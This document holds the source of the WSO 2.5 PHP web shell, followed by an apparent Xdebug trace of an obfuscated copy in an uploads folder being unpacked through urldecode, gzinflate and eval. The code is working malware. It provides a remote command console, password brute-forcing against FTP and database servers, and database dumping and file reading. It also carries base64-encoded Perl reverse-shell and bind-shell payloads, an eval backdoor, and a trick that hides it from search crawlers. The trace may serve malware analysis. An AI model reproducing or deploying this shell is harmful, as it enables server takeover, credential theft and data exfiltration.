if (preg_match("!.*cd\\s+([^;]+)\$!", $_POST['p1'], $match)) {
if (@chdir($match[1])) {
$GLOBALS['cwd'] = @getcwd();
echo "c_='" . $GLOBALS['cwd'] . "';";
}
}
echo "d.cf.output.value+='" . $temp . "';";
echo "d.cf.output.scrollTop = d.cf.output.scrollHeight;";
$temp = ob_get_clean();
echo strlen($temp), "\n", $temp;
exit;
}
if (empty($_POST['ajax']) && !empty($_POST['p1'])) {
WSOsetcookie(md5($_SERVER['HTTP_HOST']) . 'ajax', 0);
}
wsoHeader();
echo "<script>\n\tif(window.Event) window.captureEvents(Event.KEYDOWN);\n\tvar cmds = new Array('');\n\tvar cur = 0;\n\tfunction kp(e) {\n\t\tvar n = (window.Event) ? e.which : e.keyCode;\n\t\tif(n == 38) {\n\t\t\tcur--;\n\t\t\tif(cur>=0)\n\t\t\t\tdocument.cf.cmd.value = cmds[cur];\n\t\t\telse\n\t\t\t\tcur++;\n\t\t} else if(n == 40) {\n\t\t\tcur++;\n\t\t\tif(cur < cmds.length)\n\t\t\t\tdocument.cf.cmd.value = cmds[cur];\n\t\t\telse\n\t\t\t\tcur--;\n\t\t}\n\t}\n\tfunction add(cmd) {\n\t\tcmds.pop();\n\t\tcmds.push(cmd);\n\t\tcmds.push('');\n\t\tcur = cmds.length-1;\n\t}\n\t</script>";
echo "<h1>Console</h1><div class=content><form name=cf onsubmit=\"if(d.cf.cmd.value=='clear'){d.cf.output.value='';d.cf.cmd.value='';return false;}add(this.cmd.value);if(this.ajax.checked){a(null,null,this.cmd.value,this.show_errors.checked?1:'');}else{g(null,null,this.cmd.value,this.show_errors.checked?1:'');} return false;\"><select name=alias>";
foreach ($GLOBALS['aliases'] as $n => $v) {
if ($v == '') {
echo '<optgroup label="-' . htmlspecialchars($n) . '-"></optgroup>';
continue;
}
echo '<option value="' . htmlspecialchars($v) . '">' . $n . '</option>';
}
echo '</select><input type=button onclick="add(d.cf.alias.value);if(d.cf.ajax.checked){a(null,null,d.cf.alias.value,d.cf.show_errors.checked?1:\'\');}else{g(null,null,d.cf.alias.value,d.cf.show_errors.checked?1:\'\');}" value=">>"> <nobr><input type=checkbox name=ajax value=1 ' . (@$_COOKIE[md5($_SERVER['HTTP_HOST']) . 'ajax'] ? 'checked' : '') . '> send using AJAX <input type=checkbox name=show_errors value=1 ' . (!empty($_POST['p2']) || $_COOKIE[md5($_SERVER['HTTP_HOST']) . 'stderr_to_out'] ? 'checked' : '') . '> redirect stderr to stdout (2>&1)</nobr><br/><textarea class=area_main name=output style="border-bottom:0;margin:0;" readonly>';
if (!empty($_POST['p1'])) {
echo htmlspecialchars("\$ " . $_POST['p1'] . "\n" . wsoEx($_POST['p1']));
}
echo "</textarea><table style=\"border:1px solid #df5;background-color:#555;border-top:0px;\" cellpadding=0 cellspacing=0 width=\"100%\"><tr><td width=\"1%\">\$</td><td><input type=text name=cmd style=\"border:0px;width:100%;\" onkeydown=\"kp(event);\"></td></tr></table>";
echo "</form></div><script>d.cf.cmd.focus();</script>";
wsoFooter();
}
function actionLogout()
{
setcookie(md5($_SERVER['HTTP_HOST']), '', time() - 3600);
die('bye!');
}
function actionSelfRemove()
{
if ($_POST['p1'] == 'yes') {
if (@unlink("/var/www/html/base.php.cb109e011a9424f4f8958da4a88f1c0b.bin")) {
die('Shell has been removed');
} else {
echo "unlink error!";
}
}
if ($_POST['p1'] != 'yes') {
wsoHeader();
}
echo "<h1>Suicide</h1><div class=content>Really want to remove the shell?<br><a href=# onclick=\"g(null,null,'yes')\">Yes</a></div>";
wsoFooter();
}
function actionBruteforce()
{
wsoHeader();
if (isset($_POST['proto'])) {
echo '<h1>Results</h1><div class=content><span>Type:</span> ' . htmlspecialchars($_POST['proto']) . ' <span>Server:</span> ' . htmlspecialchars($_POST['server']) . '<br>';
if ($_POST['proto'] == 'ftp') {
function wsoBruteForce($ip, $port, $login, $pass)
{
$fp = @ftp_connect($ip, $port ? $port : 21);
if (!$fp) {
return false;
}
$res = @ftp_login($fp, $login, $pass);
@ftp_close($fp);
return $res;
}
} elseif ($_POST['proto'] == 'mysql') {
function wsoBruteForce($ip, $port, $login, $pass)
{
$res = @mysql_connect($ip . ':' . ($port ? $port : 3306), $login, $pass);
@mysql_close($res);
return $res;
}
} elseif ($_POST['proto'] == 'pgsql') {
function wsoBruteForce($ip, $port, $login, $pass)
{
$str = "host='" . $ip . "' port='" . $port . "' user='" . $login . "' password='" . $pass . "' dbname=postgres";
$res = @pg_connect($str);
@pg_close($res);
return $res;
}
}
$success = 0;
$attempts = 0;
$server = explode(":", $_POST['server']);
if ($_POST['type'] == 1) {
$temp = @file('/etc/passwd');
if (is_array($temp)) {
foreach ($temp as $line) {
$line = explode(":", $line);
++$attempts;
if (wsoBruteForce(@$server[0], @$server[1], $line[0], $line[0])) {
$success++;
echo '<b>' . htmlspecialchars($line[0]) . '</b>:' . htmlspecialchars($line[0]) . '<br>';
}
if (@$_POST['reverse']) {
$tmp = "";
for ($i = strlen($line[0]) - 1; $i >= 0; --$i) {
$tmp .= $line[0][$i];
}
++$attempts;
if (wsoBruteForce(@$server[0], @$server[1], $line[0], $tmp)) {
$success++;
echo '<b>' . htmlspecialchars($line[0]) . '</b>:' . htmlspecialchars($tmp);
}
}
}
}
} elseif ($_POST['type'] == 2) {
$temp = @file($_POST['dict']);
if (is_array($temp)) {
foreach ($temp as $line) {
$line = trim($line);
++$attempts;
if (wsoBruteForce($server[0], @$server[1], $_POST['login'], $line)) {
$success++;
echo '<b>' . htmlspecialchars($_POST['login']) . '</b>:' . htmlspecialchars($line) . '<br>';
}
}
}
}
echo "<span>Attempts:</span> {$attempts} <span>Success:</span> {$success}</div><br>";
}
echo '<h1>Bruteforce</h1><div class=content><table><form method=post><tr><td><span>Type</span></td><td><select name=proto><option value=ftp>FTP</option><option value=mysql>MySql</option><option value=pgsql>PostgreSql</option></select></td></tr><tr><td><input type=hidden name=c value="' . htmlspecialchars($GLOBALS['cwd']) . '">' . '<input type=hidden name=a value="' . htmlspecialchars($_POST['a']) . '">' . '<input type=hidden name=charset value="' . htmlspecialchars($_POST['charset']) . '">' . '<span>Server:port</span></td>' . '<td><input type=text name=server value="127.0.0.1"></td></tr>' . '<tr><td><span>Brute type</span></td>' . '<td><label><input type=radio name=type value="1" checked> /etc/passwd</label></td></tr>' . '<tr><td></td><td><label style="padding-left:15px"><input type=checkbox name=reverse value=1 checked> reverse (login -> nigol)</label></td></tr>' . '<tr><td></td><td><label><input type=radio name=type value="2"> Dictionary</label></td></tr>' . '<tr><td></td><td><table style="padding-left:15px"><tr><td><span>Login</span></td>' . '<td><input type=text name=login value="root"></td></tr>' . '<tr><td><span>Dictionary</span></td>' . '<td><input type=text name=dict value="' . htmlspecialchars($GLOBALS['cwd']) . 'passwd.dic"></td></tr></table>' . '</td></tr><tr><td></td><td><input type=submit value=">>"></td></tr></form></table>';
echo "</div><br>";
wsoFooter();
}
function actionSql()
{
class DbClass
{
var $type;
var $link;
var $res;
function __construct($type)
{
$this->type = $type;
}
function connect($host, $user, $pass, $dbname)
{
switch ($this->type) {
case 'mysql':
if ($this->link = @mysql_connect($host, $user, $pass, true)) {
return true;
}
break;
case 'pgsql':
$host = explode(':', $host);
if (!$host[1]) {
$host[1] = 5432;
}
if ($this->link = @pg_connect("host={$host[0]} port={$host[1]} user={$user} password={$pass} dbname={$dbname}")) {
return true;
}
break;
}
return false;
}
function selectdb($db)
{
switch ($this->type) {
case 'mysql':
if (@mysql_select_db($db)) {
return true;
}
break;
}
return false;
}
function query($str)
{
switch ($this->type) {
case 'mysql':
return $this->res = @mysql_query($str);
case 'pgsql':
return $this->res = @pg_query($this->link, $str);
}
return false;
}
function fetch()
{
$res = func_num_args() ? func_get_arg(0) : $this->res;
switch ($this->type) {
case 'mysql':
return @mysql_fetch_assoc($res);
case 'pgsql':
return @pg_fetch_assoc($res);
}
return false;
}
function listDbs()
{
switch ($this->type) {
case 'mysql':
return $this->query("SHOW databases");
case 'pgsql':
return $this->res = $this->query("SELECT datname FROM pg_database WHERE datistemplate!='t'");
}
return false;
}
function listTables()
{
switch ($this->type) {
case 'mysql':
return $this->res = $this->query('SHOW TABLES');
case 'pgsql':
return $this->res = $this->query("select table_name from information_schema.tables where table_schema != 'information_schema' AND table_schema != 'pg_catalog'");
}
return false;
}
function error()
{
switch ($this->type) {
case 'mysql':
return @mysql_error();
case 'pgsql':
return @pg_last_error();
}
return false;
}
function setCharset($str)
{
switch ($this->type) {
case 'mysql':
if (function_exists('mysql_set_charset')) {
return @mysql_set_charset($str, $this->link);
} else {
$this->query('SET CHARSET ' . $str);
}
break;
case 'pgsql':
return @pg_set_client_encoding($this->link, $str);
}
return false;
}
function loadFile($str)
{
switch ($this->type) {
case 'mysql':
return $this->fetch($this->query("SELECT LOAD_FILE('" . addslashes($str) . "') as file"));
case 'pgsql':
$this->query("CREATE TABLE wso2(file text);COPY wso2 FROM '" . addslashes($str) . "';select file from wso2;");
$r = array();
while ($i = $this->fetch()) {
$r[] = $i['file'];
}
$this->query('drop table wso2');
return array('file' => implode("\n", $r));
}
return false;
}
function dump($table, $fp = false)
{
switch ($this->type) {
case 'mysql':
$res = $this->query('SHOW CREATE TABLE `' . $table . '`');
$create = mysql_fetch_array($res);
$sql = $create[1] . ";\n";
if ($fp) {
fwrite($fp, $sql);
} else {
echo $sql;
}
$this->query('SELECT * FROM `' . $table . '`');
$i = 0;
$head = true;
while ($item = $this->fetch()) {
$sql = '';
if ($i % 1000 == 0) {
$head = true;
$sql = ";\n\n";
}
$columns = array();
foreach ($item as $k => $v) {
if ($v === null) {
$item[$k] = "NULL";
} elseif (is_int($v)) {
$item[$k] = $v;
} else {
$item[$k] = "'" . @mysql_real_escape_string($v) . "'";
}
$columns[] = "`" . $k . "`";
}
if ($head) {
$sql .= 'INSERT INTO `' . $table . '` (' . implode(", ", $columns) . ") VALUES \n\t(" . implode(", ", $item) . ')';
$head = false;
} else {
$sql .= "\n\t,(" . implode(", ", $item) . ')';
}
if ($fp) {
fwrite($fp, $sql);
} else {
echo $sql;
}
$i++;
}
if (!$head) {
if ($fp) {
fwrite($fp, ";\n\n");
} else {
echo ";\n\n";
}
}
break;
case 'pgsql':
$this->query('SELECT * FROM ' . $table);
while ($item = $this->fetch()) {
$columns = array();
foreach ($item as $k => $v) {
$item[$k] = "'" . addslashes($v) . "'";
$columns[] = $k;
}
$sql = 'INSERT INTO ' . $table . ' (' . implode(", ", $columns) . ') VALUES (' . implode(", ", $item) . ');' . "\n";
if ($fp) {
fwrite($fp, $sql);
} else {
echo $sql;
}
}
break;
}
return false;
}
}
$db = new DbClass($_POST['type']);
if (@$_POST['p2'] == 'download' && @$_POST['p1'] != 'select') {
$db->connect($_POST['sql_host'], $_POST['sql_login'], $_POST['sql_pass'], $_POST['sql_base']);
$db->selectdb($_POST['sql_base']);
switch ($_POST['charset']) {
case "Windows-1251":
$db->setCharset('cp1251');
break;
case "UTF-8":
$db->setCharset('utf8');
break;
case "KOI8-R":
$db->setCharset('koi8r');
break;
case "KOI8-U":
$db->setCharset('koi8u');
break;
case "cp866":
$db->setCharset('cp866');
break;
}
if (empty($_POST['file'])) {
ob_start("ob_gzhandler", 4096);
header("Content-Disposition: attachment; filename=dump.sql");
header("Content-Type: text/plain");
foreach ($_POST['tbl'] as $v) {
$db->dump($v);
}
exit;
} elseif ($fp = @fopen($_POST['file'], 'w')) {
foreach ($_POST['tbl'] as $v) {
$db->dump($v, $fp);
}
fclose($fp);
unset($_POST['p2']);
} else {
die('<script>alert("Error! Can\'t open file");window.history.back(-1)</script>');
}
}
wsoHeader();
echo "\n\t<h1>Sql browser</h1><div class=content>\n\t<form name='sf' method='post' onsubmit='fs(this);'><table cellpadding='2' cellspacing='0'><tr>\n\t<td>Type</td><td>Host</td><td>Login</td><td>Password</td><td>Database</td><td></td></tr><tr>\n\t<input type=hidden name=a value=Sql><input type=hidden name=p1 value='query'><input type=hidden name=p2 value=''><input type=hidden name=c value='" . htmlspecialchars($GLOBALS['cwd']) . "'><input type=hidden name=charset value='" . (isset($_POST['charset']) ? $_POST['charset'] : '') . "'>\n\t<td><select name='type'><option value='mysql' ";
if (@$_POST['type'] == 'mysql') {
echo "selected";
}
echo ">MySql</option><option value='pgsql' ";
if (@$_POST['type'] == 'pgsql') {
echo "selected";
}
echo ">PostgreSql</option></select></td>\n\t<td><input type=text name=sql_host value=\"" . (empty($_POST['sql_host']) ? 'localhost' : htmlspecialchars($_POST['sql_host'])) . "\"></td>\n\t<td><input type=text name=sql_login value=\"" . (empty($_POST['sql_login']) ? 'root' : htmlspecialchars($_POST['sql_login'])) . "\"></td>\n\t<td><input type=text name=sql_pass value=\"" . (empty($_POST['sql_pass']) ? '' : htmlspecialchars($_POST['sql_pass'])) . "\"></td><td>";
$tmp = "<input type=text name=sql_base value=''>";
if (isset($_POST['sql_host'])) {
if ($db->connect($_POST['sql_host'], $_POST['sql_login'], $_POST['sql_pass'], $_POST['sql_base'])) {
switch ($_POST['charset']) {
case "Windows-1251":
$db->setCharset('cp1251');
break;
case "UTF-8":
$db->setCharset('utf8');
break;
case "KOI8-R":
$db->setCharset('koi8r');
break;
case "KOI8-U":
$db->setCharset('koi8u');
break;
case "cp866":
$db->setCharset('cp866');
break;
}
$db->listDbs();
echo "<select name=sql_base><option value=''></option>";
while ($item = $db->fetch()) {
list($key, $value) = each($item);
echo '<option value="' . $value . '" ' . ($value == $_POST['sql_base'] ? 'selected' : '') . '>' . $value . '</option>';
}
echo "</select>";
} else {
echo $tmp;
}
} else {
echo $tmp;
}
echo "</td>\n\t\t\t\t\t<td><input type=submit value='>>' onclick='fs(d.sf);'></td>\n\t <td><input type=checkbox name=sql_count value='on'" . (empty($_POST['sql_count']) ? '' : ' checked') . "> count the number of rows</td>\n\t\t\t\t</tr>\n\t\t\t</table>\n\t\t\t<script>\n\t s_db='" . @addslashes($_POST['sql_base']) . "';\n\t function fs(f) {\n\t if(f.sql_base.value!=s_db) { f.onsubmit = function() {};\n\t if(f.p1) f.p1.value='';\n\t if(f.p2) f.p2.value='';\n\t if(f.p3) f.p3.value='';\n\t }\n\t }\n\t\t\t\tfunction st(t,l) {\n\t\t\t\t\td.sf.p1.value = 'select';\n\t\t\t\t\td.sf.p2.value = t;\n\t if(l && d.sf.p3) d.sf.p3.value = l;\n\t\t\t\t\td.sf.submit();\n\t\t\t\t}\n\t\t\t\tfunction is() {\n\t\t\t\t\tfor(i=0;i<d.sf.elements['tbl[]'].length;++i)\n\t\t\t\t\t\td.sf.elements['tbl[]'][i].checked = !d.sf.elements['tbl[]'][i].checked;\n\t\t\t\t}\n\t\t\t</script>";
if (isset($db) && $db->link) {
echo "<br/><table width=100% cellpadding=2 cellspacing=0>";
if (!empty($_POST['sql_base'])) {
$db->selectdb($_POST['sql_base']);
echo "<tr><td width=1 style='border-top:2px solid #666;'><span>Tables:</span><br><br>";
$tbls_res = $db->listTables();
while ($item = $db->fetch($tbls_res)) {
list($key, $value) = each($item);
if (!empty($_POST['sql_count'])) {
$n = $db->fetch($db->query('SELECT COUNT(*) as n FROM ' . $value . ''));
}
$value = htmlspecialchars($value);
echo "<nobr><input type='checkbox' name='tbl[]' value='" . $value . "'> <a href=# onclick=\"st('" . $value . "',1)\">" . $value . "</a>" . (empty($_POST['sql_count']) ? ' ' : " <small>({$n['n']})</small>") . "</nobr><br>";
}
echo "<input type='checkbox' onclick='is();'> <input type=button value='Dump' onclick='document.sf.p2.value=\"download\";document.sf.submit();'><br>File path:<input type=text name=file value='dump.sql'></td><td style='border-top:2px solid #666;'>";
if (@$_POST['p1'] == 'select') {
$_POST['p1'] = 'query';
$_POST['p3'] = $_POST['p3'] ? $_POST['p3'] : 1;
$db->query('SELECT COUNT(*) as n FROM ' . $_POST['p2']);
$num = $db->fetch();
$pages = ceil($num['n'] / 30);
echo "<script>d.sf.onsubmit=function(){st(\"" . $_POST['p2'] . "\", d.sf.p3.value)}</script><span>" . $_POST['p2'] . "</span> ({$num['n']} records) Page # <input type=text name='p3' value=" . (int) $_POST['p3'] . ">";
echo " of {$pages}";
if ($_POST['p3'] > 1) {
echo " <a href=# onclick='st(\"" . $_POST['p2'] . '", ' . ($_POST['p3'] - 1) . ")'>< Prev</a>";
}
if ($_POST['p3'] < $pages) {
echo " <a href=# onclick='st(\"" . $_POST['p2'] . '", ' . ($_POST['p3'] + 1) . ")'>Next ></a>";
}
$_POST['p3']--;
if ($_POST['type'] == 'pgsql') {
$_POST['p2'] = 'SELECT * FROM ' . $_POST['p2'] . ' LIMIT 30 OFFSET ' . $_POST['p3'] * 30;
} else {
$_POST['p2'] = 'SELECT * FROM `' . $_POST['p2'] . '` LIMIT ' . $_POST['p3'] * 30 . ',30';
}
echo "<br><br>";
}
if (@$_POST['p1'] == 'query' && !empty($_POST['p2'])) {
$db->query(@$_POST['p2']);
if ($db->res !== false) {
$title = false;
echo "<table width=100% cellspacing=1 cellpadding=2 class=main style=\"background-color:#292929\">";
$line = 1;
while ($item = $db->fetch()) {
if (!$title) {
echo "<tr>";
foreach ($item as $key => $value) {
echo '<th>' . $key . '</th>';
}
reset($item);
$title = true;
echo "</tr><tr>";
$line = 2;
}
echo '<tr class="l' . $line . '">';
$line = $line == 1 ? 2 : 1;
foreach ($item as $key => $value) {
if ($value == null) {
echo "<td><i>null</i></td>";
} else {
echo '<td>' . nl_two_areabr(htmlspecialchars($value)) . '</td>';
}
}
echo "</tr>";
}
echo "</table>";
} else {
echo '<div><b>Error:</b> ' . htmlspecialchars($db->error()) . '</div>';
}
}
echo "<br></form><form onsubmit='d.sf.p1.value=\"query\";d.sf.p2.value=this.query.value;document.sf.submit();return false;'><textarea name='query' style='width:100%;height:100px'>";
if (!empty($_POST['p2']) && $_POST['p1'] != 'loadfile') {
echo htmlspecialchars($_POST['p2']);
}
echo "</textarea><br/><input type=submit value='Execute'>";
echo "</td></tr>";
}
echo "</table></form><br/>";
if ($_POST['type'] == 'mysql') {
$db->query("SELECT 1 FROM mysql.user WHERE concat(`user`, '@', `host`) = USER() AND `File_priv` = 'y'");
if ($db->fetch()) {
echo "<form onsubmit='d.sf.p1.value=\"loadfile\";document.sf.p2.value=this.f.value;document.sf.submit();return false;'><span>Load file</span> <input class='tools_inp_area' type=text name=f><input type=submit value='>>'></form>";
}
}
if (@$_POST['p1'] == 'loadfile') {
$file = $db->loadFile($_POST['p2']);
echo '<br/><pre class=ml_one_area>' . htmlspecialchars($file['file']) . '</pre>';
}
} else {
echo htmlspecialchars($db->error());
}
echo "</div>";
wsoFooter();
}
function actionNetwork()
{
wsoHeader();
$back_connect_p = "IyEvdXNyl_two_areaJpbi9wZXJsDQp1c2UgU29ja2V0Ow0KJGlhZGRyPWluZXRfYXRvbigkQVJHVlswXSkgfHwgZGllKCJFcnJvcjogJCFcbiIpOw0KJHBhZGRyPXNvY2thZGRyX2luKCRBUkdWWzFdLCAkaWFkZHIpIHx8IGRpZSgiRXJyb3I6ICQhXG4iKTsNCiRwcm90bz1nZXRwcm90b2J5bmFtZSgndGNwJyk7DQpzb2NrZXQoU09DS0VULCBQRl9JTkVULCBTT0NLX1NUUkVBTSwgJHByb3RvKSB8fCBkaWUoIkVycm9yOiAkIVxuIik7DQpjb25uZWN0KFNPQ0tFVCwgJHBhZGRyKSB8fCBkaWUoIkVycm9yOiAkIVxuIik7DQpvcGVuKFNURElOLCAiPiZTT0NLRVQiKTsNCm9wZW4oU1RET1VULCAiPiZTT0NLRVQiKTsNCm9wZW4oU1RERVJSLCAiPiZTT0NLRVQiKTsNCnN5c3RlbSgnl_two_areaJpbi9zaCAtaScpOw0KY2xvc2UoU1RESU4pOw0KY2xvc2UoU1RET1VUKTsNCmNsb3NlKFNUREVSUik7";
$bind_port_p = "IyEvdXNyl_two_areaJpbi9wZXJsDQokU0hFTEw9Ii9iaW4vc2ggLWkiOw0KaWYgKEBBUkdWIDwgMSkgeyBleGl0KDEpOyB9DQp1c2UgU29ja2V0Ow0Kc29ja2V0KFMsJlBGX0lORVQsJlNPQ0tfU1RSRUFNLGdldHByb3RvYnluYW1lKCd0Y3AnKSkgfHwgZGllICJDYW50IGNyZWF0ZSBzb2NrZXRcbiI7DQpzZXRzb2Nrb3B0KFMsU09MX1NPQ0tFVCxTT19SRVVTRUFERFIsMSk7DQpiaW5kKFMsc29ja2FkZHJfaW4oJEFSR1ZbMF0sSU5BRERSX0FOWSkpIHx8IGRpZSAiQ2FudCBvcGVuIHBvcnRcbiI7DQpsaXN0ZW4oUywzKSB8fCBkaWUgIkNhbnQgbGlzdGVuIHBvcnRcbiI7DQp3aGlsZSgxKSB7DQoJYWNjZXB0KENPTk4sUyk7DQoJaWYoISgkcGlkPWZvcmspKSB7DQoJCWRpZSAiQ2Fubm90IGZvcmsiIGlmICghZGVmaW5lZCAkcGlkKTsNCgkJb3BlbiBTVERJTiwiPCZDT05OIjsNCgkJb3BlbiBTVERPVVQsIj4mQ09OTiI7DQoJCW9wZW4gU1RERVJSLCI+JkNPTk4iOw0KCQlleGVjICRTSEVMTCB8fCBkaWUgcHJpbnQgQ09OTiAiQ2FudCBleGVjdXRlICRTSEVMTFxuIjsNCgkJY2xvc2UgQ09OTjsNCgkJZXhpdCAwOw0KCX0NCn0=";
echo "<h1>Network tools</h1><div class=content>\n\t\t<form name='nfp' onSubmit=\"g(null,null,'bpp',this.port.value);return false;\">\n\t\t<span>Bind port to /bin/sh [perl]</span><br/>\n\t\tPort: <input type='text' name='port' value='31337'> <input type=submit value='>>'>\n\t\t</form>\n\t\t<form name='nfp' onSubmit=\"g(null,null,'bcp',this.server.value,this.port.value);return false;\">\n\t\t<span>Back-connect [perl]</span><br/>\n\t\tServer: <input type='text' name='server' value='" . $_SERVER['REMOTE_ADDR'] . "'> Port: <input type='text' name='port' value='31337'> <input type=submit value='>>'>\n\t\t</form><br>";
if (isset($_POST['p1'])) {
function cf($f, $t)
{
$w = @fopen($f, "w") or @function_exists('file_put_contents');
if ($w) {
@fwrite($w, @base64_decode($t));
@fclose($w);
}
}
if ($_POST['p1'] == 'bpp') {
cf("/tmp/bp.pl", $bind_port_p);
$out = wsoEx("perl /tmp/bp.pl " . $_POST['p2'] . " 1>/dev/null 2>&1 &");
sleep(1);
echo "<pre class=ml_one_area>{$out}\n" . wsoEx("ps aux | grep bp.pl") . "</pre>";
unlink("/tmp/bp.pl");
}
if ($_POST['p1'] == 'bcp') {
cf("/tmp/bc.pl", $back_connect_p);
$out = wsoEx("perl /tmp/bc.pl " . $_POST['p2'] . " " . $_POST['p3'] . " 1>/dev/null 2>&1 &");
sleep(1);
echo "<pre class=ml_one_area>{$out}\n" . wsoEx("ps aux | grep bc.pl") . "</pre>";
unlink("/tmp/bc.pl");
}
}
echo "</div>";
wsoFooter();
}
function actionRC()
{
if (!@$_POST['p1']) {
$a = array("uname" => php_uname(), "php_version" => phpversion(), "safemode" => @ini_get('safe_mode'));
echo serialize($a);
} else {
eval($_POST['p1']);
}
}
if (empty($_POST['a'])) {
if (isset($default_action) && function_exists('action' . $default_action)) {
$_POST['a'] = $default_action;
} else {
$_POST['a'] = 'SecInfo';
}
}
if (!empty($_POST['a']) && function_exists('action' . $_POST['a'])) {
call_user_func('action' . $_POST['a']);
}
exit;
};Execution traces
data/traces/97a94e18c80f1f713770c697c64928d1_trace-1676248068.7227.xtVersion: 3.1.0beta2
File format: 4
TRACE START [2023-02-12 22:28:14.620560]
1 0 1 0.000182 393512
1 3 0 0.000391 442888 {main} 1 /var/www/html/uploads/base.php 0 0
2 4 0 0.000408 442888 urldecode 0 /var/www/html/uploads/base.php 1 1 '%ED%7D%7D%7F%DB%B6%CE%E8%DF%3D%9F%82%D1%BC%C9%5E%1D%C7v%9A%ADM%E24m%9A%B4%E9%DA%A4%CBK_%D3%C7%93m%D9%D6%22%5B%9A%24%C7%C9%BA%7E%F7%0B%80%A4DI%94%ECd%DD%D9s%EF%EFz%E74%B6D%82+%08%82+%08%02%8C1f%07%81%17t%03%DB%F7%82%C8%99%8E%AA%FB%DD%27%AF%5E%D5%B6%FE%03%AF%983u%BA%A1%1DU%8D%81%13%FA%AEu%D3%A5%C2%A1Qg-%28AE%2A%D6%2C%1Aw%7D%2B%0CY%87%19%0F%DA%8F%7E%1E%3Ex%D0k%AD%3F%DA%D8h%AFo%B4%1Fl%F4%DA%0F%1E%FD%BC%FE%E8%D1%E0g%EB%D1%BA%C1%E1V%FA%9E%EB%05X%E1%BB%C1pC%3E%1C%D8Ck%E6F%5D%AB%1F9%DE%14%DE%9A%C3awbM%CD%CC%FBYhw%A'
2 4 1 0.001072 492072
2 4 R '�}}۶���=��Ѽ�^\035�v��M�4m���ڤ�K_�Ǔm��"[�$�ɺ~�\v��DI��d��s��z�4�D� \b� \b\002�1f\a�\027t\003��ș����\'�^ն�\003��3u��\035U��\023��uӥ¡Qg-(AE*�,\032w}+\fY�\031\017ڏ~\036>x�k�?��h�o�\037l��\017\036������g�Ѻ��V���\005X�pC>\034�Ck�F]�\0379�\024ޚ�awbM��Yhw�߭k(\021\0053;�?�\002�\031��s�\003o\036���\033-S��\f�+�ďn�������O拳�7�s��}�|���\\��/T� C{���=���V\020X7U��\\\033\ba�����/�O��z\021~s��\025��Ε\035��\017�t`_�\023k�s� ���\017�\021�3ꏫ��\032̙��7���_f]m�\006��5\a\037.�;~ƶ5��*�\\k5��A�\0'
2 5 0 0.001454 492040 gzinflate 0 /var/www/html/uploads/base.php 1 1 '�}}۶���=��Ѽ�^\035�v��M�4m���ڤ�K_�Ǔm��"[�$�ɺ~�\v��DI��d��s��z�4�D� \b� \b\002�1f\a�\027t\003��ș����\'�^ն�\003��3u��\035U��\023��uӥ¡Qg-(AE*�,\032w}+\fY�\031\017ڏ~\036>x�k�?��h�o�\037l��\017\036������g�Ѻ��V���\005X�pC>\034�Ck�F]�\0379�\024ޚ�awbM��Yhw�߭k(\021\0053;�?�\002�\031��s�\003o\036���\033-S��\f�+�ďn�������O拳�7�s��}�|���\\��/T� C{���=���V\020X7U��\\\033\ba�����/�O��z\021~s��\025��Ε\035��\017�t`_�\023k�s� ���\017�\021�3ꏫ��\032̙��7���_f]m�\006��5\a\037.�;~ƶ5��*�\\k5��A�\0'
2 5 1 0.002046 573992
2 5 R ' error_reporting(E_ALL);\n ini_set("display_errors", 1);\n\n $auth_pass = "4297f44b13955235245b2497399d7a93";\n $color = "#df5";\n $default_action = \'ff_man\';\n $default_use_ajax = true;\n $default_charset = \'Windows-1251\';\n\n if(!empty($_SERVER[\'HTTP_USER_AGENT\'])) {\n $userAgents = array("Google", "Slurp", "MSNBot", "ia_archiver", "Yandex", "Rambler");\n if(preg_match(\'/\' . implode(\'|\', $userAgents) . \'/i\', $_SERVER[\'HTTP_USER_AGENT\'])) {\n h'
1 A /var/www/html/uploads/base.php 1 $a = ' error_reporting(E_ALL);\n ini_set("display_errors", 1);\n\n $auth_pass = "4297f44b13955235245b2497399d7a93";\n $color = "#df5";\n $default_action = \'ff_man\';\n $default_use_ajax = true;\n $default_charset = \'Windows-1251\';\n\n if(!empty($_SERVER[\'HTTP_USER_AGENT\'])) {\n $userAgents = array("Google", "Slurp", "MSNBot", "ia_archiver", "Yandex", "Rambler");\n if(preg_match(\'/\' . implode(\'|\', $userAgents) . \'/i\', $_SERVER[\'HTTP_USER_AGENT\'])) {\n h'
2 6 0 0.004438 1101784 eval 1 ' error_reporting(E_ALL);\n ini_set("display_errors", 1);\n\n $auth_pass = "4297f44b13955235245b2497399d7a93";\n $color = "#df5";\n $default_action = \'ff_man\';\n $default_use_ajax = true;\n $default_charset = \'Windows-1251\';\n\n if(!empty($_SERVER[\'HTTP_USER_AGENT\'])) {\n $userAgents = array("Google", "Slurp", "MSNBot", "ia_archiver", "Yandex", "Rambler");\n if(preg_match(\'/\' . implode(\'|\', $userAgents) . \'/i\', $_SERVER[\'HTTP_USER_AGENT\'])) {\n header(\'HTTP/1.0 404 Not Found\');\n exit;\n }\n }\n\n @ini_set(\'error_log\',NULL);\n @ini_set(\'log_errors\',0);\n @ini_set(\'max_execution_time\',0);\n @set_time_limit(0);\n @define(\'WSO_VERSION\', \'2.5\');\n\n if(get_magic_quotes_gpc()) {\n function WSOstripslashes($array) {\n return is_array($array) ? array_map(\'WSOstripslashes\', $array) : stripslashes($array);\n }\n $_POST = WSOstripslashes($_POST);\n $_COOKIE = WSOstripslashes($_COOKIE);\n }\n\n function wsoLogin() {\n die("<div align=center><form method=post>Password: <input type=password name=pass><input type=submit value=\'>>\'></form></div>");\n }\n\n function WSOsetcookie($k, $v) {\n $_COOKIE[$k] = $v;\n setcookie($k, $v);\n }\n\n if(!empty($auth_pass)) {\n if(isset($_POST[\'pass\']) && (md5($_POST[\'pass\']) == $auth_pass))\n WSOsetcookie(md5($_SERVER[\'HTTP_HOST\']), $auth_pass);\n\n if (!isset($_COOKIE[md5($_SERVER[\'HTTP_HOST\'])]) || ($_COOKIE[md5($_SERVER[\'HTTP_HOST\'])] != $auth_pass))\n wsoLogin();\n }\n\n if(strtolower(substr(PHP_OS,0,3)) == "win")\n $os = \'win\';\n else\n $os = \'nix\';\n\n $safe_mode = @ini_get(\'safe_mode\');\n if(!$safe_mode)\n error_reporting(0);\n\n $disable_functions = @ini_get(\'disable_functions\');\n $home_cwd = @getcwd();\n if(isset($_POST[\'c\']))\n @chdir($_POST[\'c\']);\n $cwd = @getcwd();\n if($os == \'win\') {\n $home_cwd = str_replace("\\\\", "/", $home_cwd);\n $cwd = str_replace("\\\\", "/", $cwd);\n }\n if($cwd[strlen($cwd)-1] != \'/\')\n $cwd .= \'/\';\n\n if(!isset($_COOKIE[md5($_SERVER[\'HTTP_HOST\']) . \'ajax\']))\n 